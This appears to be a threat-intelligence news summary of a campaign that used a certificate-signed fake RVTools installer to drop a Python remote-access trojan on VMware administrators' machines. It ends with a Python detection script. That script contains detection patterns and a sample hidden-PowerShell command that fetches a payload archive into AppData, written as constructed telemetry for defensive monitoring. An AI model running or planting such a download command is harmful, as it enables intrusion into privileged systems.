VYPR
Breach · Published May 29, 2026 · 1 source

Malicious RVTools Installer Abuses Sectigo Certificate to Bypass SmartScreen Warnings

Attackers distributed a fake RVTools installer signed with a valid Sectigo certificate to bypass Windows SmartScreen and deploy a Python-based RAT targeting VMware administrators.

A trusted tool for VMware administrators has been weaponized. Attackers built a fake version of RVTools, a widely used utility for managing virtual infrastructure, and disguised it with a real digital certificate to slip past Windows security warnings without raising a flag. RVTools is a staple in enterprise environments. IT administrators rely on it daily to get detailed visibility into virtual machines and infrastructure. Because it is typically run by people with high-level domain access, it made for a perfect impersonation target. Whoever built this fake installer knew that, crafting a campaign to exploit the trust that enterprise teams place in signed software.

Analysts at K7 Security Labs identified and reported the attack in detail. The fake installer carried a valid code-signing certificate issued by Sectigo, registered under what appears to be a shell entity called Xiamen Lunwei Huage Network Co., Ltd. At the time of delivery, the certificate was fully valid, meaning Windows SmartScreen and most endpoint controls raised no warnings. What followed was a fully structured, three-stage attack. The malware dropped a hidden script inside the installer, ran a quiet reconnaissance sweep of the victim's system, and established a persistent remote access channel that phoned home every five minutes.

The installer used a digitally signed MSI file paired with a standard End-User License Agreement to build a convincing layer of false legitimacy. Once a user ran the file and granted administrative privileges, the installer quietly triggered a hidden VBScript stored inside the MSI's binary table. This script used decimal-to-character encoding to hide its real instructions, ensuring security scanners saw nothing alarming. It then spawned a hidden PowerShell process that downloaded a roughly 33MB archive called winp.zip from a Dropbox link and extracted it into the AppData folder. The archive contained a portable Python environment including VS Code, Spyder, Jupyter Lab, and PowerShell, burying malicious scripts among dozens of trusted tools.

After a reboot prompt framed as cleaning up installation files, persistence mechanisms activated quietly in the background. Two Python scripts got to work. The first, collector.py, performed a deep sweep of the host, gathering the hostname, MAC address, user privileges, installed services, running processes, and Active Directory details. It hashed those identifiers into a unique eight-character ID so the attacker could track the victim even across IP address changes. All collected data was saved into a file called configA.json in the temp folder. The second script, Pmanager.py, encrypted that data using RC4 combined with zlib compression and sent it to one of five hardcoded command-and-control server addresses over HTTP POST requests.

The RAT beaconed every 300 seconds and could receive instructions to run executables, launch PowerShell commands, download additional payloads, or remove itself from the machine entirely. To survive reboots, it wrote a Windows Registry Run entry and created a scheduled task running with SYSTEM-level privileges. The certificate has since been revoked, but revocation offers little protection to environments that do not enforce real-time revocation checks at execution time. Any environment relying solely on static signature validation would have seen nothing suspicious.

Organizations using VMware should verify that any RVTools installer was downloaded directly from the official website at robware.net. Security teams are advised to monitor for unexpected winp.zip files in AppData directories, watch for Python processes launched from unusual paths, and enforce real-time certificate revocation checks at execution. Blocking outbound connections to unknown IP addresses from administrative workstations adds meaningful protection against attacks like this one.
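The monitoring advice above, turned into detection logic as an added example that is not part of the K7 report or this write-up: it runs three process-creation rules (Python launched from AppData, msiexec spawning a hidden PowerShell downloader, winp.zip landing under AppData) and a 300-second beacon check over constructed Sysmon-style events. Field names, file paths and the TEST-NET addresses are assumptions for the sample data.

```python
from collections import defaultdict

# Constructed Sysmon-style process-creation events (not real telemetry); paths are hypothetical.
PROC_EVENTS = [
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://www.dropbox.com/s/PLACEHOLDER/winp.zip '
                '-OutFile $env:APPDATA\\winp.zip"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Users\admin\AppData\Roaming\winp\python.exe",
     "cmdline": r"python.exe C:\Users\admin\AppData\Roaming\winp\Pmanager.py"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Python312\python.exe",
     "cmdline": "python.exe build.py"},
]
# Constructed outbound-connection events: one process calling a TEST-NET address every ~300 s.
NET_EVENTS = [{"ts": t, "image": PROC_EVENTS[1]["image"], "dst": "203.0.113.10:80"}
              for t in (0, 301, 598, 902, 1199)] + \
             [{"ts": t, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dst": "198.51.100.7:443"}
              for t in (0, 12, 45, 300, 310)]

def flag_process(ev):
    """Return the names of the rules an event matches (empty list means no hit)."""
    image, parent, cmd = (ev[k].lower() for k in ("image", "parent", "cmdline"))
    hits = []
    # Rule 1: a Python interpreter running out of a user's AppData tree.
    if image.endswith("python.exe") and "\\appdata\\" in image:
        hits.append("python_from_appdata")
    # Rule 2: the MSI engine spawning a hidden PowerShell that reaches out over HTTP(S).
    if parent.endswith("msiexec.exe") and image.endswith("powershell.exe") \
            and ("-w hidden" in cmd or "windowstyle hidden" in cmd) and "http" in cmd:
        hits.append("msiexec_hidden_powershell_download")
    # Rule 3: the campaign's archive name being written under AppData.
    if "winp.zip" in cmd and "appdata" in cmd:
        hits.append("winp_zip_in_appdata")
    return hits

def beacon_candidates(conns, period=300, jitter=20, min_samples=4):
    """Report (image, dst) pairs whose connection gaps all sit within `jitter` of `period`."""
    by_pair = defaultdict(list)
    for c in conns:
        by_pair[(c["image"], c["dst"])].append(c["ts"])
    found = []
    for pair, times in by_pair.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(times) >= min_samples and all(abs(g - period) <= jitter for g in gaps):
            found.append(pair)
    return found
```

The beacon check is deliberately strict (every gap near the period); real telemetry with jittered or missed check-ins would need a tolerance on the fraction of matching gaps rather than `all`.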

Synthesized by Vypr AI